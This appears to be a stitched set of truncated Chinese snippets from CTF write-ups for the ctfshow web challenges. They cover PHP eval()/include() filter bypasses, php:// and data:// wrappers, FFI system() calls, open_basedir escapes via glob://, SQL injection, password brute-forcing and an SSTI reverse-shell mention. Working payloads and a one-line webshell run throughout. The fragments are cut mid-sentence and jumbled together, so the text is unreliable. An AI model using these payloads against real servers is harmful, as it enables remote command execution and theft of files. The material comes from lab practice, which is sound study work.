web74:eval() 利用,正则绕过。 web75:eval() 利用,正则绕过,PDO 利用。 web76:eval() 利用,正则绕过,PDO 利用。 web77:eval() 利用,正则绕过,伪协议glob://,FFI 利用。 web78:include() 利用,伪协议php://。 web79:include() 利用,伪协议data://。 web80:include() 利用,一句话木马之 Nginx 日志...
}else{highlight_file(__FILE__); 与web32类似,去掉双引号去可。 Copy ?c=$nice=include$_GET[url]?>&url=data://text/plain,<?php%20system("cat%20flag.php");%20?> web34 与上面33没区别,一样的payload即可。 web35 一样,多过滤个等于号,payload: Copy ?c=include$_GET[url]?>&url=data...
做完ctfshow web 29 ~ 77、118~124的总结,写的比较简略。 PHP 中简单的 eval 函数执行字符限制绕过 使用通配符 * and ? ?c=system('tac f*'); 使用` 执行命令 ?c=`cp fla?.???1.txt`; 构造一句话木马,利用其它变量传入php执行语句 ?c=eval($_GET[1]);&1=system("cat flag.php"); 利用伪协...
php7.4版本以上才有$ffi=FFI::cdef("int system(const char *command);");//创建一个system对象$a='/readflag > 1.txt';//没有回显的$ffi->system($a);//通过$ffi去调用system函数 5.web118 是使用system函数执行 echo ${PWD} /root echo ${PWD:0:1} 表示从0下标开始的第一个字符 / / echo ...
web58-web77: 突破disable_function 最后是一些综合题 web29 AI检测代码解析 if(!preg_match("/flag/i", $c)){ eval($c); 1. 2. i:不区分大小写 payload: AI检测代码解析 system("nl fla???"); system("nl fla*"); echo `nl fl''ag.php`;或者c=echo `nl fl“”ag.php`; echo...
{"success":true,"msg":"\u6570\u636e\u5e93\u8fde\u63a5\u6210\u529f","flag":"ctfshow{c98a6e02-3d77-4f80-be47-4eb21cd74f3b}"} 用web21给的txt爆密码是7758521(Sniper) POST /checkdb.php HTTP/1.1 Host: 4131cf5d-8cc3-401c-b3a3-5651b4135dc6.challenge.ctf.show ...
Web72: 使用了open_basedir进行文件访问限制,可以使用使用glob://伪协议绕过open_basedir,可以参考shu师傅的博客[ctfshow]web入门——命令执行(web72-web77)_命令执行 web72-CSDN博客c=?><?php $a=new DirectoryIterator("glob:///*"); foreach($a as $f) {echo($f->__toString().' '); } ...
CTFSHOW(WEB) web入门 给她1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 复制代码 1 2 3 4 5 <?php$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));$sql=sprintf("select * from user where name='%s'$pass",addslashes($_GET['name'...
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....
web 371 做到这里差不多就完了 过滤了print,考虑反弹shell外带 建议看羽师傅的博客,因为我也是看的yu师傅的博客,抄过来真的没意思。 毕竟: 话是这么说,不过还是抄一手过来方便以后复习 http://c8f74fd3-a05a-477c-bb97-10325b9ce77d.chall.ctf.show?name= {% set c=(t|count)%} {% set cc=(dict...